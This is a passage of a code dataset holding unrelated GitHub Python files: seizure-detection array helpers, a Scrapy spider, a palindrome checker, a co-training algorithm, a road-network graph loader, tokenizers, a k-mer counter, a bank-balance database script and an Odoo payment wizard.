np.zeros(1, dtype=bool)\n merge_idx = np.concatenate((element, merge_idx, element))\n merge_idx = find_szr_idx(merge_idx)\n merge_idx[:, 1] +=1\n merge_idx -= 1 # (-1 for extra addition at 0 element)\n \n # make a copy and leave unchanged, index for original array\n idx = np.copy(merge_idx)\n\n for i in range(merge_idx.shape[0]): # loop though index\n low = merge_idx[i,0]; upper = merge_idx[i,1] # get upper and lower boundaries\n bounds_out[ merge_idx[i,0],:] = [bounds[idx[i,0],0], bounds[idx[i,1],1]] # replace merged \n rmv_idx = np.linspace(low, upper, int(upper-low)+1) # get removal index\n rmv_idx = np.delete(rmv_idx,0).astype(np.int64) # remove first element and convert to int\n bounds_out = np.delete(bounds_out, rmv_idx , axis=0) # delete next element\n merge_idx -= rmv_idx.shape[0] # remove one from index because of deleted element \n \n return bounds_out\n \n\n# find matching seizures \n@jit(nopython=True) \ndef match_szrs(idx_true, idx_pred, err_margin = 5):\n \"\"\"\n match_szrs(idx_true,idx_pred, err_margin)\n\n Parameters\n ----------\n idx_true : Bool, ndarray, User defined (ground truth) boolean index\n idx_pred : Bool, ndarray, Predicted index\n err_margin : int, optional, Default values = 5.\n\n Returns\n -------\n matching : int, number of matching seizures\n\n \"\"\"\n matching = 0 # number of matching seizures\n \n for i in range(idx_true.shape[0]):\n \n # does min bound match within error margin?\n min_bound = np.any(np.abs(np.subtract(idx_true[i,0],idx_pred[:,0])) more than 10 seconds\n sum_continous_segments = np.sum(remove_zeros(pred.copy(),\n pred, bounds))\n \n # pass to index array\n idx[i] = sum_continous_segments\n \n return idx > 0 # convert to logic\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n\n\n","repo_name":"neurosimata/seizy","sub_path":"helper/array_helper.py","file_name":"array_helper.py","file_ext":"py","file_size_in_byte":7340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
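`find_szr_idx` in the array_helper.py record pads a boolean trace with zeros, locates peaks with scipy, then walks outward to the enclosing zeros to recover `[start, stop]` pairs. A toy demonstration of the same bound-finding idea:

```python
import numpy as np
from scipy import signal

pred = np.array([0, 1, 1, 1, 0, 0, 1, 1, 0], dtype=float)
padded = np.concatenate(([0.0], pred, [0.0]))        # zero-pad both ends
peaks = signal.find_peaks(padded, height=1, distance=1)[0]

bounds = []
for p in peaks:
    start = p
    while padded[start - 1] != 0.0:                  # walk left to a zero
        start -= 1
    stop = p
    while padded[stop + 1] != 0.0:                   # walk right to a zero
        stop += 1
    bounds.append((start - 1, stop - 1))             # undo the padding offset

print(bounds)  # [(1, 3), (6, 7)]
```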
+{"seq_id":"4911317167","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy_splash import SplashRequest\n\n\n# lua scripts -->\nscript = \"\"\"\n\nfunction main(splash, args)\n assert(splash:go(args.url))\n assert(splash:wait(2))\n splash:set_viewport_full()\n return {\n html = splash:html()\n }\nend\n\n\"\"\"\n\n\npagination_script = \"\"\"\nfunction main(splash, args)\n assert(splash:go(args.url))\n assert(splash:wait(2)) \n assert(splash:runjs('document.querySelector(\".page-number div a:nth-child(' .. splash.args.value .. ')\").click()'))\n assert(splash:wait(1))\n splash:set_viewport_full()\n return {\n html = splash:html()\n }\nend\n\"\"\"\n\n\nclass SpiderScriptSpider(scrapy.Spider):\n\n name = 'spider_script'\n allowed_domains = ['fdc.nal.usda.gov']\n\n def start_requests(self):\n url = 'https://fdc.nal.usda.gov/fdc-app.html#/food-search'\n\n # This is crawled about 9 pages max due to for loop\n for i in range(1, 10):\n yield SplashRequest(url=url, callback=self.parse,\n endpoint='execute',\n cache_args=['lua_source'],\n args={'lua_source': pagination_script, 'value': i},\n headers={'X-My-Header': 'value'},\n dont_filter=True\n )\n\n def parse(self, response):\n description_row = '//tr[@name=\"search-food-result-row\"]'\n url_xpath = './/td[@headers=\"food-Search-result-description-header\"]/a[@class=\"result-description\"]/@href'\n\n for rows in response.xpath(description_row):\n\n published = rows.xpath(\n './/td[@headers=\"Food-Search-result-published-date-header\"]/text()').extract_first()\n url = rows.xpath(url_xpath).extract_first()\n page_url = 'https://fdc.nal.usda.gov/fdc-app.html'+url\n\n yield SplashRequest(url=page_url, callback=self.parse_all_info,\n meta={'published': published},\n endpoint='execute',\n cache_args=['lua_source'],\n args={'lua_source': script},\n headers={'X-My-Header': 'value'},\n dont_filter=True\n )\n\n def getActualData(self, list_data):\n if list_data:\n sent = ''\n for sentence in list_data:\n sent += sentence.strip()\n list_data = sent\n return list_data\n\n def parse_all_info(self, response):\n description_xpath = '//span[@id=\"foodDetailsDescription\"]/h1/text()'\n\n data_type_xpath = '//span[@id=\"foodType\"]/span/following-sibling::text()'\n\n fdc_id_xpath = '//span[@id=\"foodDetailsFdcId\"]/span/following-sibling::text()'\n\n food_code_xpath = '//span[@id=\"surveyFoodCode\"]/span/following-sibling::text()'\n\n food_category_xpath = '//span[contains(text(), \"Food Category:\")]/following-sibling::text()'\n\n description = response.xpath(description_xpath).extract_first()\n dataType = response.xpath(data_type_xpath).extract_first()\n fdcId = response.xpath(fdc_id_xpath).extract()\n foodCode = response.xpath(food_code_xpath).extract_first()\n foodCategory = response.xpath(food_category_xpath).extract_first()\n published = response.meta.get('published')\n\n fdcId = self.getActualData(fdcId)\n foodCode = self.getActualData(foodCode)\n foodCategory = self.getActualData(foodCategory)\n published = self.getActualData(published)\n\n yield {\n 'Description': description,\n 'Data-Type': dataType,\n 'FDC-ID': fdcId,\n 'Food-Code': foodCode,\n 'Food-Category': foodCategory,\n 'Published': published\n }\n","repo_name":"shuvabiswas12/Ajax-Based-Website-Crawling-using-Scrapy-and-Splash","sub_path":"scrapy_project/spiders/spider_script.py","file_name":"spider_script.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6196790072","text":"\n# Python 
script to return True if the input string is a palindrome and False otherwise\n# The script is case-insensitive and ignores any non-alphanumeric characters\n\nimport sys\n\ninput_str = sys.argv[1]\n\ndef isPalindrome(input_str):\n\n try:\n \n result_str = \"\".join(char.lower() for char in input_str if char.isalnum())\n\n return result_str == result_str[::-1]\n\n except:\n\n print('An error occurred')\n\ncheck_palindrome = isPalindrome(input_str)\n\nprint('The input string \"' + input_str + '\" is a palindrome: ' + str(check_palindrome))\n","repo_name":"gfttraining/tasks","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2687461801","text":"'''\nDescription:\n Contains the KeCo algorithm implementation\n\nTested in python 2.7.9, with the following list of installed python packages and versions:\n numpy==1.9.2, scikit-learn==0.16.1, scipy==0.15.1\n\n@authors: Laurens van de Wiel, Evgeni Levin\n'''\n\nimport numpy as np\n\ndef training(X, Y, V, order_of_samples, kernel, kernel_parameter, _lambda):\n \"\"\"Simulates the training of the KeCo algorithm\n X : training set containing the examples\n Y : training set labels (for unlabelled 0, labelled is +1 or -1)\n V : number of views\n order_of_samples : array with indices (to X and Y) representing the order of learning from the dataset\n kernel : kernel method that is to be used\n kernel_parameter : value of c (constant) for linear kernel, sigma for gaussian kernel, gamma for rbf_kernel\n _lambda : the regularization parameter\"\"\"\n \n # initialize alphas and predictions as a dictionary, with keys representing the views\n alphas = {}\n predictions = {}\n for n in range(V):\n # values for alphas and predictions are a dictionary, with keys representing the sample_index\n alphas[n] = {}\n predictions[n] = {}\n \n t = 0\n for i in order_of_samples: # retrieve the index of the sample that is used for current iteration\n t += 1\n # train a single iteration\n train_iteration(X, Y, V, predictions, alphas, i, t, kernel, kernel_parameter, _lambda)\n \n return alphas, predictions\n\ndef train_iteration(X, Y, V, predictions, alphas, i, t, kernel, kernel_parameter, _lambda):\n \"\"\"Simulates a single training iteration for the KeCo algorithm\n X : training set containing the examples\n Y : training set labels (for unlabelled 0, labelled is +1 or -1)\n V : number of views\n predictions : predictions made so far (optimization, so predictions do not need to be recalculated each iteration)\n alphas : the alpha vectors (sparse vector representing weight per sample)\n i : index for the current sample that is to be learned from\n t : number of the current iteration, with 1<= t <= T\n kernel : kernel method that is to be used\n kernel_parameter : value of c (constant) for linear kernel, sigma for gaussian kernel, gamma for rbf_kernel\n _lambda : the regularization parameter\"\"\"\n \n # retrieve the predictions for sample i\n for n in range(V):\n if not predictions[n].has_key(i):\n predictions[n][i] = 0.0\n \n predictions[n][i] = coagreement_prediction_for_view_n(X[n][i], X, Y, V, n, t, predictions, alphas, kernel, kernel_parameter, _lambda)\n \n \n for n in range(V):\n # compute loss\n z = z_j(Y, V, i, n, predictions)*predictions[n][i]\n if np.maximum(0, 1.-z) > 0: \n # positive hinge loss, increment alpha weight\n if not(alphas[n].has_key(i)):\n alphas[n][i] = 0.0 # ensure we are not 
receiving key not found error\n alphas[n][i] += 1.0\n \n\ndef coagreement_prediction_for_view_n(x_i, X, Y, V, n, t, predictions, alphas, kernel, kernel_parameter, _lambda):\n \"\"\"Performs a single prediction for a sample x_i for the view n\n x_i : the sample, whose label is to be predicted\n X : training set containing the examples\n Y : training set labels (for unlabelled 0, labelled is +1 or -1)\n V : number of views\n n : the index of the view this prediction is for\n t : number of the current iteration, with 1<= t <= T\n predictions : predictions made so far (optimization, so predictions do not need to be recalculated each iteration)\n alphas : the alpha vectors (sparse vector representing weight per sample)\n kernel : kernel method that is to be used\n kernel_parameter : value of c (constant) for linear kernel, sigma for gaussian kernel, gamma for rbf_kernel\n _lambda : the regularization parameter\"\"\"\n \n # initialize the predition as 0\n y_pred_i =0.\n \n # iterate over the alphas and form predictions\n for j in alphas[n].keys():\n if kernel_parameter is None:\n y_pred_i += alphas[n][j]*z_j(Y, V, j, n, predictions)*(kernel(x_i, X[n][j])[0][0])\n else:\n y_pred_i += alphas[n][j]*z_j(Y, V, j, n, predictions)*(kernel(x_i, X[n][j], kernel_parameter)[0][0])\n \n # Apply the regularization\n y_pred_i /= (_lambda * t)\n y_pred_i = y_pred_i\n \n # return the prediction\n return y_pred_i\n\n\ndef z_j(Y, V, j, n, predictions):\n \"\"\" retrieve_label_j_for_view_n\n Returns the label for labelled examples and the signed\n co-agreement for unlabelled examples.\"\"\"\n if Y[j] == 0.:\n return c_j(n, j, V, predictions)\n else:\n return Y[j]\n \n\ndef c_j(n, j, V, predictions):\n \"\"\"Perform the coagreement for view n\n Co-agreement represents the agreement between the\n different views in order to label an example.\"\"\"\n # ensure we have at least multiple views\n assert V >= 2\n \n c = 0.0\n for v in range(V):\n if v != n:\n c += predictions[v][j]\n c = np.sign(c)\n \n return c","repo_name":"laurensvdwiel/KeCo","sub_path":"src/KeCo.py","file_name":"KeCo.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31634947312","text":"# -*- coding:utf-8 -*-\n\nfrom math import radians, cos, sin, asin, sqrt, ceil\nimport os\n\nimport folium\nimport networkx as nx\nimport numpy as np\nimport pyproj\n\n\nfrom MRD.mrd_package.mrd.Data import Data\n# python -m pip install pyproj-1.9.5.1-cp37-cp37m-win_amd64.whl\n\n\n# 球面三角形による二点間の距離を計算\ndef haversine(lon1, lat1, lon2, lat2):\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n km = 6371* c # 地球の半径 6371km\n return km\n\n\nif __name__ == \"__main__\":\n\n center = 35.440374, 139.4866845\n distance = 10.0 # km\n\n data_dir = os.path.normpath(r\"C:\\Users\\hiroki\\PycharmProjects\\mrd\\MRD\\data\")\n d = Data()\n d.set_area(center, distance)\n d.set_path(data_dir)\n d.load()\n\n # 有向グラフ作成\n G = nx.DiGraph()\n\n # ノードを追加\n for node in d.road.all_node.keys():\n G.add_node(node)\n\n # エッジを追加\n piece_length = []\n for k, v, in d.road.all_way.items():\n for i in range(len(v.link)):\n if i == len(v.link) - 1:\n break\n lat_1, lon_1 = v.link[i]\n lat_2, lon_2 = v.link[i+1]\n dist = haversine(lon_1, lat_1, lon_2, lat_2)\n piece_length.append(dist)\n\n # 一方通行規制 正方向のみ\n if v.link_kisei in (4, 6):\n G.add_edge(k[0], k[1], 
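The alpha update in the KeCo record follows a kernelized Pegasos-style rule: predict with a kernel-weighted sum of alphas scaled by `1/(lambda*t)`, then increment the current example's alpha whenever the hinge loss is positive. A compact single-view, fully supervised analogue with a linear kernel — an intuition sketch only, not the multi-view co-training algorithm itself:

```python
import numpy as np

def train_kernel_hinge(X, y, lam=0.1, epochs=5):
    n = len(X)
    alpha = np.zeros(n)
    K = X @ X.T                          # linear-kernel Gram matrix
    t = 0
    for _ in range(epochs):
        for i in range(n):
            t += 1
            pred = (alpha * y) @ K[:, i] / (lam * t)   # regularized prediction
            if 1.0 - y[i] * pred > 0:    # hinge loss is active
                alpha[i] += 1.0
    return alpha

X = np.array([[1.0, 2.0], [2.0, 1.0], [-1.0, -2.0], [-2.0, -1.0]])
y = np.array([1.0, 1.0, -1.0, -1.0])
print(train_kernel_hinge(X, y))
```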
weight=v.link_length, link=v.link, piece_length=piece_length)\n # 一方通行規制 逆方向のみ\n elif v.link_kisei in (5, 7):\n G.add_edge(k[1], k[0], weight=v.link_length, link=v.link[::-1], piece_length=piece_length[::-1])\n # 規制なし 双方向\n else:\n G.add_edge(k[0], k[1], weight=v.link_length, link=v.link, piece_length=piece_length)\n G.add_edge(k[1], k[0], weight=v.link_length, link=v.link[::-1], piece_length=piece_length[::-1])\n\n print(nx.info(G))\n nx.write_gpickle(G, 'yamato.pickle')\n\n# # 地図\n# map_ = folium.Map(location=[center[0], center[1]], zoom_start=18, control_scale=True, prefer_canvas=True)\n# for k, v in d.road.all_way.items():\n# reverse = False\n# if v.link_kisei in [4,5,6,7,8]:\n# link_length = \"length: {}m\".format(str(v.link_length))\n# if v.link_kisei in [5, 7]:\n# reverse = True\n# arrows = get_arrows(locations=v.link, reverse=reverse)\n# for arrow in arrows:\n# arrow.add_to(map_)\n# folium.PolyLine(locations=v.link, tooltip=link_length, color=\"red\", weight=\"4.5\", opacity=0.6).add_to(map_)\n#\n# map_.save('my_map.html')\n","repo_name":"hirosait/networkx","sub_path":"networkx_loader.py","file_name":"networkx_loader.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72911252946","text":"import sys\nfrom PyQt5 import QtWidgets\n\ndef window():\n app = QtWidgets.QApplication(sys.argv) # create app object\n\n w = QtWidgets.QWidget() # create window and set title\n w.setWindowTitle('Learning PyQt5')\n\n L1 = QtWidgets.QLabel(w) # add label to the window\n L1.setText('Hello World') # set text to the label\n L1.move(120, 60) # move label\n\n w.setGeometry(500, 150, 300, 200) # set window geomatry\n w.show()\n sys.exit(app.exec_())\n\nwindow()\n","repo_name":"farazahmediu01/The-Python-Workbook-","sub_path":"Pyqt/Pyqt_stuff/pyqt_experiment/pyqt5 lesson 2 label.py","file_name":"pyqt5 lesson 2 label.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"35569416634","text":"from transformers import GPT2Tokenizer as GPT2Tok\nfrom transformers import BertTokenizer as BertTok\nimport sentencepiece as spm\n\nclass Capita:\n def forward(self, text):\n # words = nltk.tokenize.word_tokenize(text)\n words = text.split(\" \")\n final_words = []\n for word in words:\n if not word.isalpha():\n final_words.append(word.lower())\n else:\n if word.islower():\n pass\n elif word.isupper():\n final_words.append(\"⇧\")\n elif word[0].isupper() and word[1:].islower():\n final_words.append(\"↑\")\n else:\n final_words.append(\"↑\")\n final_words.append(word.lower())\n return \" \".join(final_words)\n\n def backward(self, text):\n words = text.split(\" \")\n final_words = []\n all_caps = False\n capitalized = False\n for w in words:\n if w == \"⇧\":\n all_caps = True\n elif w == \"↑\":\n capitalized = True\n else:\n final_word = w\n if all_caps:\n final_word = final_word.upper()\n elif capitalized:\n if len(final_word) <= 1:\n final_word = final_word.upper()\n else:\n final_word = final_word[0].upper()+final_word[1:]\n final_words.append(final_word)\n all_caps = False\n capitalized = False\n return \" \".join(final_words)\n\nclass BPETokenizer:\n def __init__(self, bpe_model, use_capita=True):\n self.sp = spm.SentencePieceProcessor()\n self.sp.Load(bpe_model)\n self.use_capita = use_capita\n\n self.pad_tok, self.start_tok, self.end_tok = \"\", \"\", \"\"\n self.pad_id, self.start_id, self.end_id = 
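The networkx_loader.py record weights directed edges with great-circle distances. A toy check of that combination — build a three-node `DiGraph` the same way and query a shortest path (the coordinates are invented):

```python
from math import radians, sin, cos, asin, sqrt
import networkx as nx

def haversine(lon1, lat1, lon2, lat2):
    # same spherical-law formula as in the record; returns kilometres
    lon1, lat1, lon2, lat2 = map(radians, (lon1, lat1, lon2, lat2))
    dlon, dlat = lon2 - lon1, lat2 - lat1
    a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2
    return 6371 * 2 * asin(sqrt(a))

G = nx.DiGraph()
G.add_edge("A", "B", weight=haversine(139.48, 35.44, 139.50, 35.45))  # ~2.1 km
G.add_edge("B", "C", weight=haversine(139.50, 35.45, 139.52, 35.44))  # ~2.1 km
G.add_edge("A", "C", weight=10.0)                                     # longer direct road

print(nx.shortest_path(G, "A", "C", weight="weight"))  # ['A', 'B', 'C']
```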
tuple(self.sp.piece_to_id(p) for p in [self.pad_tok, self.start_tok, self.end_tok])\n\n self.vocab_size = self.sp.get_piece_size()\n\n if self.use_capita:\n self.cpt = Capita()\n\n def tokenize(self, text):\n if len(text) == 0:\n return []\n if text[:len(self.start_tok)] == self.start_tok and text[len(self.start_tok)] != \" \":\n text = text.replace(self.start_tok, self.start_tok+\" \")\n\n if self.use_capita:\n text = self.cpt.forward(text)\n tokens = self.sp.encode_as_pieces(text)\n tokens = [w for i, w in enumerate(tokens) if (i < (len(tokens)-1) and tokens[i+1] not in [\"⇧\", \"↑\"]) or i==(len(tokens)-1)]\n if tokens[0] == \"▁\":\n tokens = tokens[1:]\n return tokens\n\n def encode(self, text):\n tokens = self.tokenize(text)\n token_ids = [self.sp.piece_to_id(w) for w in tokens]\n return token_ids\n\n def decode(self, token_ids):\n text = self.sp.decode_ids(token_ids).replace(\"⇧\", \" ⇧\").replace(\"↑\", \" ↑\")\n if self.use_capita:\n text = self.cpt.backward(text)\n text = text.replace(self.start_tok+\" \", self.start_tok)\n return text\n\nclass BERTCacheTokenizer:\n def __init__(self):\n self.cache = {}\n self.cache_keys = []\n self.tokenizer = BertTok.from_pretrained(\"bert-base-uncased\")\n # self.tokenizer.max_len = 10000 # This was removed in later transformer tokenizers\n\n def encode(self, text):\n if text in self.cache:\n return self.cache[text]\n\n output = self.tokenizer.encode(text)\n\n if len(self.cache) > 1000:\n del self.cache[self.cache_keys.pop(0)]\n self.cache[text] = output\n self.cache_keys.append(text)\n return output\n\nclass GPT2Tokenizer:\n def __init__(self):\n self.tokenizer = GPT2Tok.from_pretrained(\"gpt2\")\n # self.tokenizer.max_len = 10000\n\n self.pad_tok, self.start_tok, self.end_tok = \"\", \" ST\", \" END\"\n\n self.pad_id = 0\n self.start_id = self.tokenizer.encode(self.start_tok)[0]\n self.end_id = self.tokenizer.encode(self.end_tok)[0]\n self.vocab_size = self.tokenizer.vocab_size\n\n def tokenize(self, text):\n return self.tokenizer.tokenize(text)\n\n def encode(self, text):\n return self.tokenizer.encode(text)\n\n def decode(self, token_ids):\n return self.tokenizer.decode(token_ids)\n","repo_name":"CannyLab/summary_loop","sub_path":"utils_tokenizer.py","file_name":"utils_tokenizer.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"48"} +{"seq_id":"39989398674","text":"file_input = open('./2020/day12/input.txt').read().strip().split('\\n')\n\n# print(file_input)\nfacing = 90\nx = 0\ny = 0\n\nfor inp in file_input:\n action = inp[0:1]\n value = int(inp[1:])\n\n # print(action, value)\n\n if (action == 'R' or action == 'L'):\n if action == \"R\":\n facing += value\n else:\n facing -= value\n if facing < 0:\n facing = 360 - (-facing)\n facing %= 360\n\n if action == 'F':\n if facing == 0:\n y = y + value\n elif facing == 90:\n x = x + value\n elif facing == 180:\n y = y - value\n else:\n x = x - value\n else:\n if action == 'N':\n y = y + value\n elif action == \"S\":\n y = y - value\n elif action == \"W\":\n x = x - value\n elif action == \"E\":\n x = x + value\n\n\nresult = abs(x) + abs(y)\n\nprint(result)\n","repo_name":"reviakin/adventofcode","sub_path":"2020/day12/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13410256344","text":"from collections import defaultdict\nfrom pprint import pprint\nimport re\nimport 
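`Capita` in the utils_tokenizer.py record encodes word case with `⇧` (all caps) and `↑` (capitalized) markers so the text itself can be stored lowercase. A standalone round-trip demonstrating the scheme for simple words — a simplified reimplementation for illustration, not the class above:

```python
def encode_case(text):
    out = []
    for w in text.split(" "):
        if w.isalpha() and w.isupper():
            out += ["⇧", w.lower()]                 # all-caps marker
        elif w.isalpha() and w[:1].isupper() and w[1:].islower():
            out += ["↑", w.lower()]                 # capitalized marker
        else:
            out.append(w.lower() if w.isalpha() else w)
    return " ".join(out)

def decode_case(text):
    out, mode = [], None
    for w in text.split(" "):
        if w in ("⇧", "↑"):
            mode = w                                # remember pending marker
        else:
            if mode == "⇧":
                w = w.upper()
            elif mode == "↑":
                w = w.capitalize()
            out.append(w)
            mode = None
    return " ".join(out)

s = "NASA sent Rovers to mars"
assert decode_case(encode_case(s)) == s
```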
pickle\nimport operator\nfrom itertools import permutations\nfrom timeit import timeit\n\n\nfrom utils import *\n\ngenome = \"CACAGTAGGCGCCGGCACACACAGCCCCGGGCCCCGGGCCGCCCCGGGCCGGCGGCCGCCGGCGCCGGCACACCGGCACAGCCGTACCGGCACAGTAGTACCGGCCGGCCGGCACACCGGCACACCGGGTACACACCGGGGCGCACACACAGGCGGGCGCCGGGCCCCGGGCCGTACCGGGCCGCCGGCGGCCCACAGGCGCCGGCACAGTACCGGCACACACAGTAGCCCACACACAGGCGGGCGGTAGCCGGCGCACACACACACAGTAGGCGCACAGCCGCCCACACACACCGGCCGGCCGGCACAGGCGGGCGGGCGCACACACACCGGCACAGTAGTAGGCGGCCGGCGCACAGCC\"\nk = 10\nd = 2\n\ndef main():\n kmers = find_kmers(k, genome)\n counts = defaultdict(int)\n num_kmers = len(genome) - k + 1\n\n with progress_bar(num_kmers, \"Searching\") as progress:\n\n for index in range(num_kmers):\n word = genome[index:index + k]\n progress.update(index)\n\n permuted_strings = mutations(word, d)\n\n for permutation in permuted_strings:\n counts[permutation] += 1\n\n sorted_kmers = sorted(counts.iteritems(), key=lambda x: x[1])\n pprint(sorted_kmers[-10:])\n\ndef old_algorithm():\n kmers = find_kmers(k, genome)\n counts = defaultdict(int)\n num_kmers = len(kmers)\n\n\n with progress_bar(num_kmers, \"Searching\") as progress:\n for count, search_string in enumerate(kmers.keys()):\n progress.update(count)\n\n permuted_strings = mutations(search_string, d)\n # permuted_strings = permutations(search_string)\n # num_permutations = len(permuted_strings)\n # print(num_permutations)\n\n for pcount, permutation in enumerate(permuted_strings):\n # if pcount % 1000 == 0:\n # print(\"{:.2f}\".format(pcount/float(num_permutations)*100))\n if permutation not in counts:\n # print(permutation)\n\n for index in range(len(genome) - k + 1):\n word = genome[index:index + k]\n miss_count = 0\n for x, letter in enumerate(word):\n if letter != permutation[x]:\n miss_count += 1\n if miss_count > d:\n break\n\n if miss_count <= d:\n counts[permutation] += 1\n\n\n sorted_kmers = sorted(counts.iteritems(), key=operator.itemgetter(1))\n pprint(sorted_kmers[-10:])\n\n\nif __name__ == '__main__':\n print(\"First: {:.2f} seconds\".format(timeit(main, number=1)))\n print(\"Second: {:.2f} seconds\".format(timeit(old_algorithm, number=1)))\n","repo_name":"jpinsonault/bioinformatics_challenges","sub_path":"problem7.py","file_name":"problem7.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20956448851","text":"RANDOM_STATE = 42\n\nDATA_TEST_SIZE = .3\nDATA_N = 10_000\n\nY_TRAIN = './train/'\nY_TRAIN_FULL = Y_TRAIN + 'y.pckl'\nX_TRAIN = './train/'\nX_TRAIN_FULL = X_TRAIN + 'x.pckl'\nY_TEST = './test/'\nY_TEST_FULL = Y_TEST + 'y.pckl'\nX_TEST = './test/'\nX_TEST_FULL = X_TEST + 'x.pckl'\n\nDATA_PATH = './data_default/' + 'house-pricing.csv'\n\nMODEL = './model/'\nMODEL_FULL = MODEL + 'model.pckl'\n","repo_name":"6boyz/ml-ops","sub_path":"consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24794726543","text":"'''\r\nExample module for getting input from a Database table and Updating data in a target table.\r\nUsing pyodbc library for interfacing with SQL Server Database.\r\n'''\r\nimport pyodbc\r\ntry:\r\n conn=pyodbc.connect(\"Driver={SQL Server};\" \"Server=localhost,53551;\" \"Database=PriyaDB;\" \"Trusted-connection = yes;\")\r\n cursor=conn.cursor()\r\n conn1=pyodbc.connect(\"Driver={SQL Server};\" \"Server=localhost,53551;\" \"Database=PriyaDB;\" \"Trusted-connection = yes;\")\r\n 
cursor1=conn1.cursor()\r\n cursor.execute(\"select c.cust_id,c.cust_name,a.acct_id,a.balance from cust_info c inner join acct_info a on c.cust_id = a.cust_id \")\r\n row=cursor.fetchone()\r\n bank={}\r\n while row:\r\n bank_dict={}\r\n bank_dict[\"cust_name\"]=row[1]\r\n bank_dict[\"balance\"] = int(row[3])\r\n if row[0] in bank:\r\n v=bank[row[0]]\r\n v[\"balance\"]= v[\"balance\"]+int(row[3])\r\n\r\n else:\r\n bank[row[0]]=bank_dict\r\n row=cursor.fetchone()\r\n print(bank)\r\n for key, value in bank.items():\r\n print(key, value)\r\n insert_str = '''insert into statement1_info values({cust_id},'{cust_name}',{balance})'''\r\n sql_command = insert_str.format(cust_id=key, cust_name=value[\"cust_name\"], balance=value[\"balance\"])\r\n cursor1.execute(sql_command)\r\nexcept Exception as e:\r\n print(e)\r\n\r\nfinally:\r\n conn1.commit()\r\n conn.close()\r\n conn1.close()","repo_name":"padmapriyacoll/code-examples","sub_path":"python/BankAcccount.py","file_name":"BankAcccount.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34797370491","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api, _\n\n\nclass PaymentOrderCreate(models.TransientModel):\n _inherit = 'payment.order.create'\n\n @api.multi\n def _prepare_payment_line(self, payment, line):\n \"\"\"This function is designed to be inherited\n The resulting dict is passed to the create method of payment.line\"\"\"\n self.ensure_one()\n _today = fields.Date.context_today(self)\n date_to_pay = False # no payment date => immediate payment\n if payment.date_prefered == 'due':\n # -- account_banking\n # date_to_pay = line.date_maturity\n date_to_pay = (\n line.date_maturity\n if line.date_maturity and line.date_maturity > _today\n else False)\n # -- end account banking\n elif payment.date_prefered == 'fixed':\n # -- account_banking\n # date_to_pay = payment.date_scheduled\n date_to_pay = (\n payment.date_scheduled\n if payment.date_scheduled and payment.date_scheduled > _today\n else False)\n # -- end account banking\n # -- account_banking\n state = 'structured'\n communication = line.ref or '-'\n if line.invoice:\n if line.invoice.reference_type == 'structured':\n state = 'structured'\n # Fallback to invoice number to keep previous behaviour\n communication = line.invoice.reference or line.invoice.number\n else:\n if line.invoice.type in ('in_invoice', 'in_refund'):\n communication = (\n line.invoice.reference or\n line.invoice.supplier_invoice_number or line.ref)\n else:\n # Make sure that the communication includes the\n # customer invoice number (in the case of debit order)\n communication = line.invoice.number\n # support debit orders when enabled\n if line.debit > 0:\n amount_currency = line.amount_residual_currency * -1\n else:\n amount_currency = line.amount_residual_currency\n if payment.payment_order_type == 'debit':\n amount_currency *= -1\n line2bank = line.line2bank(payment.mode.id)\n # -- end account banking\n res = {'move_line_id': line.id,\n 'amount_currency': amount_currency,\n 'bank_id': line2bank.get(line.id),\n 'order_id': payment.id,\n 'partner_id': line.partner_id and line.partner_id.id or False,\n # account banking\n 'communication': communication,\n 'state': state,\n # end account banking\n 'date': date_to_pay,\n 'currency': (line.invoice and line.invoice.currency_id.id or\n line.journal_id.currency.id or\n line.journal_id.company_id.currency_id.id)}\n return res\n\n @api.multi\n def 
create_payment(self):\n \"\"\"This method is a slightly modified version of the existing method on\n this model in account_payment.\n - pass the payment mode to line2bank()\n - allow invoices to create influence on the payment process: not only\n 'Free' references are allowed, but others as well\n - check date_to_pay is not in the past.\n \"\"\"\n if not self.entries:\n return {'type': 'ir.actions.act_window_close'}\n context = self.env.context\n payment_line_obj = self.env['payment.line']\n payment = self.env['payment.order'].browse(context['active_id'])\n # Populate the current payment with new lines:\n for line in self.entries:\n vals = self._prepare_payment_line(payment, line)\n payment_line_obj.create(vals)\n # Force reload of payment order view as a workaround for lp:1155525\n return {'name': _('Payment Orders'),\n 'context': context,\n 'view_type': 'form',\n 'view_mode': 'form,tree',\n 'res_model': 'payment.order',\n 'res_id': context['active_id'],\n 'type': 